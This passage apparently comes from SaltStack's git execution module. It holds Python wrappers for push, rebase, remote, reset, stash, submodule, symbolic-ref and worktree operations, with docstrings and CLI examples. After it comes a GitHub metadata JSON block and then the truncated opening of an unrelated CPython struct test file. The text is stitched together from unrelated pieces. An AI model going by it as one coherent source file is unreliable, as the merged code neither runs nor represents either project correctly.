.. versionadded:: 2015.8.0
ref : master
Name of the ref to push
.. note::
Being a refspec_, this argument can include a colon to define local
and remote ref names.
branch
Name of the ref to push
.. deprecated:: 2015.8.0
Use ``ref`` instead
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
identity
Path to a private key to use for ssh URLs
.. warning::
Unless Salt is invoked from the minion using ``salt-call``, the
key(s) must be passphraseless. For greater security with
passphraseless private keys, see the `sshd(8)`_ manpage for
information on securing the keypair from the remote side in the
``authorized_keys`` file.
.. _`sshd(8)`: http://www.man7.org/linux/man-pages/man8/sshd.8.html#AUTHORIZED_KEYS_FILE%20FORMAT
.. versionchanged:: 2015.8.7
Salt will no longer attempt to use passphrase-protected keys unless
invoked from the minion using ``salt-call``, to prevent blocking
waiting for user input.
Key can also be specified as a SaltStack file server URL, eg. salt://location/identity_file
.. versionchanged:: 2016.3.0
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
saltenv
The default salt environment to pull sls files from
.. versionadded:: 2016.3.1
.. _`git-push(1)`: http://git-scm.com/docs/git-push
.. _refspec: http://git-scm.com/book/en/v2/Git-Internals-The-Refspec
CLI Example:
.. code-block:: bash
# Push master as origin/master
salt myminion git.push /path/to/repo origin master
# Push issue21 as upstream/develop
salt myminion git.push /path/to/repo upstream issue21:develop
# Delete remote branch 'upstream/temp'
salt myminion git.push /path/to/repo upstream :temp
'''
kwargs = salt.utils.clean_kwargs(**kwargs)
branch_ = kwargs.pop('branch', None)
if kwargs:
salt.utils.invalid_kwargs(kwargs)
cwd = _expand_path(cwd, user)
if branch_:
salt.utils.warn_until(
'Nitrogen',
'The \'branch\' argument to git.push has been deprecated, please '
'use \'ref\' instead.'
)
ref = branch_
command = ['git', 'push']
command.extend(_format_opts(opts))
if not isinstance(remote, six.string_types):
remote = str(remote)
if not isinstance(ref, six.string_types):
ref = str(ref)
command.extend([remote, ref])
return _git_run(command,
cwd=cwd,
runas=user,
identity=identity,
ignore_retcode=ignore_retcode,
saltenv=saltenv)['stdout']
def rebase(cwd, rev='master', opts='', user=None, ignore_retcode=False):
'''
Interface to `git-rebase(1)`_
cwd
The path to the git checkout
rev : master
The revision to rebase onto the current branch
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-rebase(1)`: http://git-scm.com/docs/git-rebase
CLI Example:
.. code-block:: bash
salt myminion git.rebase /path/to/repo master
salt myminion git.rebase /path/to/repo 'origin master'
salt myminion git.rebase /path/to/repo origin/master opts='--onto newbranch'
'''
cwd = _expand_path(cwd, user)
opts = _format_opts(opts)
if any(x for x in opts if x in ('-i', '--interactive')):
raise SaltInvocationError('Interactive rebases are not supported')
command = ['git', 'rebase']
command.extend(opts)
if not isinstance(rev, six.string_types):
rev = str(rev)
command.extend(salt.utils.shlex_split(rev))
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def remote_get(cwd,
remote='origin',
user=None,
redact_auth=True,
ignore_retcode=False):
'''
Get the fetch and push URL for a specific remote
cwd
The path to the git checkout
remote : origin
Name of the remote to query
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
redact_auth : True
Set to ``False`` to include the username/password if the remote uses
HTTPS Basic Auth. Otherwise, this information will be redacted.
.. warning::
Setting this to ``False`` will not only reveal any HTTPS Basic Auth
that is configured, but the return data will also be written to the
job cache. When possible, it is recommended to use SSH for
authentication.
.. versionadded:: 2015.5.6
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
CLI Examples:
.. code-block:: bash
salt myminion git.remote_get /path/to/repo
salt myminion git.remote_get /path/to/repo upstream
'''
cwd = _expand_path(cwd, user)
all_remotes = remotes(cwd,
user=user,
redact_auth=redact_auth,
ignore_retcode=ignore_retcode)
if remote not in all_remotes:
raise CommandExecutionError(
'Remote \'{0}\' not present in git checkout located at {1}'
.format(remote, cwd)
)
return all_remotes[remote]
def remote_refs(url,
heads=False,
tags=False,
user=None,
identity=None,
https_user=None,
https_pass=None,
ignore_retcode=False,
saltenv='base'):
'''
.. versionadded:: 2015.8.0
Return the remote refs for the specified URL
url
URL of the remote repository
heads : False
Restrict output to heads. Can be combined with ``tags``.
tags : False
Restrict output to tags. Can be combined with ``heads``.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
identity
Path to a private key to use for ssh URLs
.. warning::
Unless Salt is invoked from the minion using ``salt-call``, the
key(s) must be passphraseless. For greater security with
passphraseless private keys, see the `sshd(8)`_ manpage for
information on securing the keypair from the remote side in the
``authorized_keys`` file.
.. _`sshd(8)`: http://www.man7.org/linux/man-pages/man8/sshd.8.html#AUTHORIZED_KEYS_FILE%20FORMAT
.. versionchanged:: 2015.8.7
Salt will no longer attempt to use passphrase-protected keys unless
invoked from the minion using ``salt-call``, to prevent blocking
waiting for user input.
Key can also be specified as a SaltStack file server URL, eg. salt://location/identity_file
.. versionchanged:: 2016.3.0
https_user
Set HTTP Basic Auth username. Only accepted for HTTPS URLs.
https_pass
Set HTTP Basic Auth password. Only accepted for HTTPS URLs.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
saltenv
The default salt environment to pull sls files from
.. versionadded:: 2016.3.1
CLI Example:
.. code-block:: bash
salt myminion git.remote_refs https://github.com/saltstack/salt.git
'''
command = ['git', 'ls-remote']
if heads:
command.append('--heads')
if tags:
command.append('--tags')
try:
command.append(salt.utils.url.add_http_basic_auth(url,
https_user,
https_pass,
https_only=True))
except ValueError as exc:
raise SaltInvocationError(exc.__str__())
output = _git_run(command,
runas=user,
identity=identity,
ignore_retcode=ignore_retcode,
saltenv=saltenv)['stdout']
ret = {}
for line in salt.utils.itertools.split(output, '\n'):
try:
sha1_hash, ref_name = line.split(None, 1)
except ValueError:
continue
ret[ref_name] = sha1_hash
return ret
def remote_set(cwd,
url,
remote='origin',
user=None,
https_user=None,
https_pass=None,
push_url=None,
push_https_user=None,
push_https_pass=None,
ignore_retcode=False):
'''
cwd
The path to the git checkout
url
Remote URL to set
remote : origin
Name of the remote to set
push_url
If unset, the push URL will be identical to the fetch URL.
.. versionadded:: 2015.8.0
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
https_user
Set HTTP Basic Auth username. Only accepted for HTTPS URLs.
.. versionadded:: 2015.5.0
https_pass
Set HTTP Basic Auth password. Only accepted for HTTPS URLs.
.. versionadded:: 2015.5.0
push_https_user
Set HTTP Basic Auth user for ``push_url``. Ignored if ``push_url`` is
unset. Only accepted for HTTPS URLs.
.. versionadded:: 2015.8.0
push_https_pass
Set HTTP Basic Auth password for ``push_url``. Ignored if ``push_url``
is unset. Only accepted for HTTPS URLs.
.. versionadded:: 2015.8.0
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
CLI Examples:
.. code-block:: bash
salt myminion git.remote_set /path/to/repo git@github.com:user/repo.git
salt myminion git.remote_set /path/to/repo git@github.com:user/repo.git remote=upstream
salt myminion git.remote_set /path/to/repo https://github.com/user/repo.git remote=upstream push_url=git@github.com:user/repo.git
'''
# Check if remote exists
if remote in remotes(cwd, user=user):
log.debug(
'Remote \'{0}\' already exists in git checkout located at {1}, '
'removing so it can be re-added'.format(remote, cwd)
)
command = ['git', 'remote', 'rm', remote]
_git_run(command, cwd=cwd, runas=user, ignore_retcode=ignore_retcode)
# Add remote
try:
url = salt.utils.url.add_http_basic_auth(url,
https_user,
https_pass,
https_only=True)
except ValueError as exc:
raise SaltInvocationError(exc.__str__())
if not isinstance(remote, six.string_types):
remote = str(remote)
if not isinstance(url, six.string_types):
url = str(url)
command = ['git', 'remote', 'add', remote, url]
_git_run(command, cwd=cwd, runas=user, ignore_retcode=ignore_retcode)
if push_url:
if not isinstance(push_url, six.string_types):
push_url = str(push_url)
try:
push_url = salt.utils.url.add_http_basic_auth(push_url,
push_https_user,
push_https_pass,
https_only=True)
except ValueError as exc:
raise SaltInvocationError(exc.__str__())
command = ['git', 'remote', 'set-url', '--push', remote, push_url]
_git_run(command, cwd=cwd, runas=user, ignore_retcode=ignore_retcode)
return remote_get(cwd=cwd,
remote=remote,
user=user,
ignore_retcode=ignore_retcode)
def remotes(cwd, user=None, redact_auth=True, ignore_retcode=False):
'''
Get fetch and push URLs for each remote in a git checkout
cwd
The path to the git checkout
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
redact_auth : True
Set to ``False`` to include the username/password for authenticated
remotes in the return data. Otherwise, this information will be
redacted.
.. warning::
Setting this to ``False`` will not only reveal any HTTPS Basic Auth
that is configured, but the return data will also be written to the
job cache. When possible, it is recommended to use SSH for
authentication.
.. versionadded:: 2015.5.6
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
CLI Example:
.. code-block:: bash
salt myminion git.remotes /path/to/repo
'''
cwd = _expand_path(cwd, user)
command = ['git', 'remote', '--verbose']
ret = {}
output = _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
for remote_line in salt.utils.itertools.split(output, '\n'):
try:
remote, remote_info = remote_line.split(None, 1)
except ValueError:
continue
try:
remote_url, action = remote_info.rsplit(None, 1)
except ValueError:
continue
# Remove parenthesis
action = action.lstrip('(').rstrip(')').lower()
if action not in ('fetch', 'push'):
log.warning(
'Unknown action \'{0}\' for remote \'{1}\' in git checkout '
'located in {2}'.format(action, remote, cwd)
)
continue
if redact_auth:
remote_url = salt.utils.url.redact_http_basic_auth(remote_url)
ret.setdefault(remote, {})[action] = remote_url
return ret
def reset(cwd, opts='', user=None, ignore_retcode=False):
'''
Interface to `git-reset(1)`_, returns the stdout from the git command
cwd
The path to the git checkout
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-reset(1)`: http://git-scm.com/docs/git-reset
CLI Examples:
.. code-block:: bash
# Soft reset to a specific commit ID
salt myminion git.reset /path/to/repo ac3ee5c
# Hard reset
salt myminion git.reset /path/to/repo opts='--hard origin/master'
'''
cwd = _expand_path(cwd, user)
command = ['git', 'reset']
command.extend(_format_opts(opts))
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def rev_parse(cwd, rev=None, opts='', user=None, ignore_retcode=False):
'''
.. versionadded:: 2015.8.0
Interface to `git-rev-parse(1)`_
cwd
The path to the git checkout
rev
Revision to parse. See the `SPECIFYING REVISIONS`_ section of the
`git-rev-parse(1)`_ manpage for details on how to format this argument.
This argument is optional when using the options in the `Options for
Files` section of the `git-rev-parse(1)`_ manpage.
opts
Any additional options to add to the command line, in a single string
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. _`git-rev-parse(1)`: http://git-scm.com/docs/git-rev-parse
.. _`SPECIFYING REVISIONS`: http://git-scm.com/docs/git-rev-parse#_specifying_revisions
.. _`Options for Files`: http://git-scm.com/docs/git-rev-parse#_options_for_files
CLI Examples:
.. code-block:: bash
# Get the full SHA1 for HEAD
salt myminion git.rev_parse /path/to/repo HEAD
# Get the short SHA1 for HEAD
salt myminion git.rev_parse /path/to/repo HEAD opts='--short'
# Get the develop branch's upstream tracking branch
salt myminion git.rev_parse /path/to/repo 'develop@{upstream}' opts='--abbrev-ref'
# Get the SHA1 for the commit corresponding to tag v1.2.3
salt myminion git.rev_parse /path/to/repo 'v1.2.3^{commit}'
# Find out whether or not the repo at /path/to/repo is a bare repository
salt myminion git.rev_parse /path/to/repo opts='--is-bare-repository'
'''
cwd = _expand_path(cwd, user)
command = ['git', 'rev-parse']
command.extend(_format_opts(opts))
if rev is not None:
if not isinstance(rev, six.string_types):
rev = str(rev)
command.append(rev)
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def revision(cwd, rev='HEAD', short=False, user=None, ignore_retcode=False):
'''
Returns the SHA1 hash of a given identifier (hash, branch, tag, HEAD, etc.)
cwd
The path to the git checkout
rev : HEAD
The revision
short : False
If ``True``, return an abbreviated SHA1 git hash
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
CLI Example:
.. code-block:: bash
salt myminion git.revision /path/to/repo mybranch
'''
cwd = _expand_path(cwd, user)
if not isinstance(rev, six.string_types):
rev = str(rev)
command = ['git', 'rev-parse']
if short:
command.append('--short')
command.append(rev)
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def rm_(cwd, filename, opts='', user=None, ignore_retcode=False):
'''
Interface to `git-rm(1)`_
cwd
The path to the git checkout
filename
The location of the file/directory to remove, relative to ``cwd``
.. note::
To remove a directory, ``-r`` must be part of the ``opts``
parameter.
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-rm(1)`: http://git-scm.com/docs/git-rm
CLI Examples:
.. code-block:: bash
salt myminion git.rm /path/to/repo foo/bar.py
salt myminion git.rm /path/to/repo foo/bar.py opts='--dry-run'
salt myminion git.rm /path/to/repo foo/baz opts='-r'
'''
cwd = _expand_path(cwd, user)
command = ['git', 'rm']
command.extend(_format_opts(opts))
command.extend(['--', filename])
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def stash(cwd, action='save', opts='', user=None, ignore_retcode=False):
'''
Interface to `git-stash(1)`_, returns the stdout from the git command
cwd
The path to the git checkout
opts
Any additional options to add to the command line, in a single string.
Use this to complete the ``git stash`` command by adding the remaining
arguments (i.e. ``'save <stash comment>'``, ``'apply stash@{2}'``,
``'show'``, etc.). Omitting this argument will simply run ``git
stash``.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-stash(1)`: http://git-scm.com/docs/git-stash
CLI Examples:
.. code-block:: bash
salt myminion git.stash /path/to/repo save opts='work in progress'
salt myminion git.stash /path/to/repo apply opts='stash@{1}'
salt myminion git.stash /path/to/repo drop opts='stash@{1}'
salt myminion git.stash /path/to/repo list
'''
cwd = _expand_path(cwd, user)
if not isinstance(action, six.string_types):
# No numeric actions but this will prevent a traceback when the git
# command is run.
action = str(action)
command = ['git', 'stash', action]
command.extend(_format_opts(opts))
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def status(cwd, user=None, ignore_retcode=False):
'''
.. versionchanged:: 2015.8.0
Return data has changed from a list of lists to a dictionary
Returns the changes to the repository
cwd
The path to the git checkout
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
CLI Example:
.. code-block:: bash
salt myminion git.status /path/to/repo
'''
cwd = _expand_path(cwd, user)
state_map = {
'M': 'modified',
'A': 'new',
'D': 'deleted',
'??': 'untracked'
}
ret = {}
command = ['git', 'status', '-z', '--porcelain']
output = _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
for line in output.split('\0'):
try:
state, filename = line.split(None, 1)
except ValueError:
continue
ret.setdefault(state_map.get(state, state), []).append(filename)
return ret
def submodule(cwd,
command,
opts='',
user=None,
identity=None,
ignore_retcode=False,
saltenv='base',
**kwargs):
'''
.. versionchanged:: 2015.8.0
Added the ``command`` argument to allow for operations other than
``update`` to be run on submodules, and deprecated the ``init``
argument. To do a submodule update with ``init=True`` moving forward,
use ``command=update opts='--init'``
Interface to `git-submodule(1)`_
cwd
The path to the submodule
command
Submodule command to run, see `git-submodule(1) <git submodule>` for
more information. Any additional arguments after the command (such as
the URL when adding a submodule) must be passed in the ``opts``
parameter.
.. versionadded:: 2015.8.0
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
init : False
If ``True``, ensures that new submodules are initialized
.. deprecated:: 2015.8.0
Pass ``init`` as the ``command`` parameter, or include ``--init``
in the ``opts`` param with ``command`` set to update.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
identity
Path to a private key to use for ssh URLs
.. warning::
Unless Salt is invoked from the minion using ``salt-call``, the
key(s) must be passphraseless. For greater security with
passphraseless private keys, see the `sshd(8)`_ manpage for
information on securing the keypair from the remote side in the
``authorized_keys`` file.
.. _`sshd(8)`: http://www.man7.org/linux/man-pages/man8/sshd.8.html#AUTHORIZED_KEYS_FILE%20FORMAT
.. versionchanged:: 2015.8.7
Salt will no longer attempt to use passphrase-protected keys unless
invoked from the minion using ``salt-call``, to prevent blocking
waiting for user input.
Key can also be specified as a SaltStack file server URL, eg. salt://location/identity_file
.. versionchanged:: 2016.3.0
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
saltenv
The default salt environment to pull sls files from
.. versionadded:: 2016.3.1
.. _`git-submodule(1)`: http://git-scm.com/docs/git-submodule
CLI Example:
.. code-block:: bash
# Update submodule and ensure it is initialized (before 2015.8.0)
salt myminion git.submodule /path/to/repo/sub/repo init=True
# Update submodule and ensure it is initialized (2015.8.0 and later)
salt myminion git.submodule /path/to/repo/sub/repo update opts='--init'
# Rebase submodule (2015.8.0 and later)
salt myminion git.submodule /path/to/repo/sub/repo update opts='--rebase'
# Add submodule (2015.8.0 and later)
salt myminion git.submodule /path/to/repo/sub/repo add opts='https://mydomain.tld/repo.git'
# Unregister submodule (2015.8.0 and later)
salt myminion git.submodule /path/to/repo/sub/repo deinit
'''
kwargs = salt.utils.clean_kwargs(**kwargs)
init_ = kwargs.pop('init', False)
if kwargs:
salt.utils.invalid_kwargs(kwargs)
cwd = _expand_path(cwd, user)
if init_:
raise SaltInvocationError(
'The \'init\' argument is no longer supported. Either set '
'\'command\' to \'init\', or include \'--init\' in the \'opts\' '
'argument and set \'command\' to \'update\'.'
)
if not isinstance(command, six.string_types):
command = str(command)
cmd = ['git', 'submodule', command]
cmd.extend(_format_opts(opts))
return _git_run(cmd,
cwd=cwd,
runas=user,
identity=identity,
ignore_retcode=ignore_retcode,
saltenv=saltenv)['stdout']
def symbolic_ref(cwd,
ref,
value=None,
opts='',
user=None,
ignore_retcode=False):
'''
.. versionadded:: 2015.8.0
Interface to `git-symbolic-ref(1)`_
cwd
The path to the git checkout
ref
Symbolic ref to read/modify
value
If passed, then the symbolic ref will be set to this value and an empty
string will be returned.
If not passed, then the ref to which ``ref`` points will be returned,
unless ``--delete`` is included in ``opts`` (in which case the symbolic
ref will be deleted).
opts
Any additional options to add to the command line, in a single string
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-symbolic-ref(1)`: http://git-scm.com/docs/git-symbolic-ref
CLI Examples:
.. code-block:: bash
# Get ref to which HEAD is pointing
salt myminion git.symbolic_ref /path/to/repo HEAD
# Set/overwrite symbolic ref 'FOO' to local branch 'foo'
salt myminion git.symbolic_ref /path/to/repo FOO refs/heads/foo
# Delete symbolic ref 'FOO'
salt myminion git.symbolic_ref /path/to/repo FOO opts='--delete'
'''
cwd = _expand_path(cwd, user)
command = ['git', 'symbolic-ref']
opts = _format_opts(opts)
if value is not None and any(x in opts for x in ('-d', '--delete')):
raise SaltInvocationError(
'Value cannot be set for symbolic ref if -d/--delete is included '
'in opts'
)
command.extend(opts)
command.append(ref)
if value:
command.extend(value)
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def version(versioninfo=False):
'''
.. versionadded:: 2015.8.0
Returns the version of Git installed on the minion
versioninfo : False
If ``True``, return the version in a versioninfo list (e.g. ``[2, 5,
0]``)
CLI Example:
.. code-block:: bash
salt myminion git.version
'''
contextkey = 'git.version'
contextkey_info = 'git.versioninfo'
if contextkey not in __context__:
try:
version_ = _git_run(['git', '--version'])['stdout']
except CommandExecutionError as exc:
log.error(
'Failed to obtain the git version (error follows):\n{0}'
.format(exc)
)
version_ = 'unknown'
try:
__context__[contextkey] = version_.split()[-1]
except IndexError:
# Somehow git --version returned no stdout while not raising an
# error. Should never happen but we should still account for this
# possible edge case.
log.error('Running \'git --version\' returned no stdout')
__context__[contextkey] = 'unknown'
if not versioninfo:
return __context__[contextkey]
if contextkey_info not in __context__:
# Set ptr to the memory location of __context__[contextkey_info] to
# prevent repeated dict lookups
ptr = __context__.setdefault(contextkey_info, [])
for part in __context__[contextkey].split('.'):
try:
ptr.append(int(part))
except ValueError:
ptr.append(part)
return __context__[contextkey_info]
def worktree_add(cwd,
worktree_path,
ref=None,
reset_branch=None,
force=None,
detach=False,
opts='',
user=None,
ignore_retcode=False,
**kwargs):
'''
.. versionadded:: 2015.8.0
Interface to `git-worktree(1)`_, adds a worktree
cwd
The path to the git checkout
worktree_path
Path to the new worktree. Can be either absolute, or relative to
``cwd``.
branch
Name of new branch to create. If omitted, will be set to the basename
of the ``worktree_path``. For example, if the ``worktree_path`` is
``/foo/bar/baz``, then ``branch`` will be ``baz``.
ref
Name of the ref on which to base the new worktree. If omitted, then
``HEAD`` is use, and a new branch will be created, named for the
basename of the ``worktree_path``. For example, if the
``worktree_path`` is ``/foo/bar/baz`` then a new branch ``baz`` will be
created, and pointed at ``HEAD``.
reset_branch : False
If ``False``, then `git-worktree(1)`_ will fail to create the worktree
if the targeted branch already exists. Set this argument to ``True`` to
reset the targeted branch to point at ``ref``, and checkout the
newly-reset branch into the new worktree.
force : False
By default, `git-worktree(1)`_ will not permit the same branch to be
checked out in more than one worktree. Set this argument to ``True`` to
override this.
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` to avoid causing errors
with Salt's own argument parsing.
All CLI options for adding worktrees as of Git 2.5.0 are already
supported by this function as of Salt 2015.8.0, so using this
argument is unnecessary unless new CLI arguments are added to
`git-worktree(1)`_ and are not yet supported in Salt.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-worktree(1)`: http://git-scm.com/docs/git-worktree
CLI Examples:
.. code-block:: bash
salt myminion git.worktree_add /path/to/repo/main ../hotfix ref=origin/master
salt myminion git.worktree_add /path/to/repo/main ../hotfix branch=hotfix21 ref=v2.1.9.3
'''
_check_worktree_support()
kwargs = salt.utils.clean_kwargs(**kwargs)
branch_ = kwargs.pop('branch', None)
if kwargs:
salt.utils.invalid_kwargs(kwargs)
cwd = _expand_path(cwd, user)
if branch_ and detach:
raise SaltInvocationError(
'Only one of \'branch\' and \'detach\' is allowed'
)
command = ['git', 'worktree', 'add']
if detach:
if force:
log.warning(
'\'force\' argument to git.worktree_add is ignored when '
'detach=True'
)
command.append('--detach')
else:
if not branch_:
branch_ = os.path.basename(worktree_path)
command.extend(['-B' if reset_branch else '-b', branch_])
if force:
command.append('--force')
command.extend(_format_opts(opts))
if not isinstance(worktree_path, six.string_types):
worktree_path = str(worktree_path)
command.append(worktree_path)
if ref:
if not isinstance(ref, six.string_types):
ref = str(ref)
command.append(ref)
# Checkout message goes to stderr
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode,
redirect_stderr=True)['stdout']
def worktree_prune(cwd,
dry_run=False,
verbose=True,
expire=None,
opts='',
user=None,
ignore_retcode=False):
'''
.. versionadded:: 2015.8.0
Interface to `git-worktree(1)`_, prunes stale worktree administrative data
from the gitdir
cwd
The path to the main git checkout or a linked worktree
dry_run : False
If ``True``, then this function will report what would have been
pruned, but no changes will be made.
verbose : True
Report all changes made. Set to ``False`` to suppress this output.
expire
Only prune unused worktree data older than a specific period of time.
The date format for this parameter is described in the documentation
for the ``gc.pruneWorktreesExpire`` config param in the
`git-config(1)`_ manpage.
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` to avoid causing errors
with Salt's own argument parsing.
All CLI options for pruning worktrees as of Git 2.5.0 are already
supported by this function as of Salt 2015.8.0, so using this
argument is unnecessary unless new CLI arguments are added to
`git-worktree(1)`_ and are not yet supported in Salt.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-worktree(1)`: http://git-scm.com/docs/git-worktree
.. _`git-config(1)`: http://git-scm.com/docs/git-config/2.5.1
CLI Examples:
.. code-block:: bash
salt myminion git.worktree_prune /path/to/repo
salt myminion git.worktree_prune /path/to/repo dry_run=True
salt myminion git.worktree_prune /path/to/repo expire=1.day.ago
'''
_check_worktree_support()
cwd = _expand_path(cwd, user)
command = ['git', 'worktree', 'prune']
if dry_run:
command.append('--dry-run')
if verbose:
command.append('--verbose')
if expire:
if not isinstance(expire, six.string_types):
expire = str(expire)
command.extend(['--expire', expire])
command.extend(_format_opts(opts))
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def worktree_rm(cwd, user=None):
'''
.. versionadded:: 2015.8.0
Recursively removes the worktree located at ``cwd``, returning ``True`` if
successful. This function will attempt to determine if ``cwd`` is actually
a worktree by invoking :py:func:`git.is_worktree
<salt.modules.git.is_worktree>`. If the path does not correspond to a
worktree, then an error will be raised and no action will be taken.
.. warning::
There is no undoing this action. Be **VERY** careful before running
this function.
cwd
Path to the worktree to be removed
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
CLI Examples:
.. code-block:: bash
salt myminion git.worktree_rm /path/to/worktree
'''
_check_worktree_support()
cwd = _expand_path(cwd, user)
if not os.path.exists(cwd):
raise CommandExecutionError(cwd + ' does not exist')
elif not is_worktree(cwd):
raise CommandExecutionError(cwd + ' is not a git worktree')
try:
salt.utils.rm_rf(cwd)
except Exception as exc:
raise CommandExecutionError(
'Unable to remove {0}: {1}'.format(cwd, exc)
)
return True
|
{
"content_hash": "2709eb1517c8e374ccfe944d0f207a8b",
"timestamp": "",
"source": "github",
"line_count": 3995,
"max_line_length": 137,
"avg_line_length": 32.858573216520654,
"alnum_prop": 0.5706787537137198,
"repo_name": "stephane-martin/salt-debian-packaging",
"id": "0eda16a68a00ef75de64fee8fd5099d5cd5a4c0c",
"size": "131294",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "salt-2016.3.2/salt/modules/git.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "13798"
},
{
"name": "C",
"bytes": "986"
},
{
"name": "Groff",
"bytes": "13634346"
},
{
"name": "HTML",
"bytes": "39558"
},
{
"name": "Makefile",
"bytes": "20902"
},
{
"name": "NSIS",
"bytes": "22316"
},
{
"name": "PowerShell",
"bytes": "38719"
},
{
"name": "Python",
"bytes": "40857506"
},
{
"name": "SaltStack",
"bytes": "58278"
},
{
"name": "Scheme",
"bytes": "1790"
},
{
"name": "Shell",
"bytes": "829927"
},
{
"name": "Tcl",
"bytes": "6532"
},
{
"name": "TeX",
"bytes": "11632"
}
],
"symlink_target": ""
}
|
import os
import array
import unittest
import struct
import inspect
from test import test_support as support
from test.test_support import (check_warnings, check_py3k_warnings)
import sys
ISBIGENDIAN = sys.byteorder == "big"
IS32BIT = sys.maxsize == 0x7fffffff
integer_codes = 'b', 'B', 'h', 'H', 'i', 'I', 'l', 'L', 'q', 'Q'
testmod_filename = os.path.splitext(__file__)[0] + '.py'
# Native 'q' packing isn't available on systems that don't have the C
# long long type.
try:
struct.pack('q', 5)
except struct.error:
HAVE_LONG_LONG = False
else:
HAVE_LONG_LONG = True
def string_reverse(s):
return "".join(reversed(s))
def bigendian_to_native(value):
if ISBIGENDIAN:
return value
else:
return string_reverse(value)
class StructTest(unittest.TestCase):
def check_float_coerce(self, format, number):
# SF bug 1530559. struct.pack raises TypeError where it used
# to convert.
with check_warnings((".*integer argument expected, got float",
DeprecationWarning)) as w:
got = struct.pack(format, number)
lineno = inspect.currentframe().f_lineno - 1
self.assertEqual(w.filename, testmod_filename)
self.assertEqual(w.lineno, lineno)
self.assertEqual(len(w.warnings), 1)
expected = struct.pack(format, int(number))
self.assertEqual(got, expected)
def test_isbigendian(self):
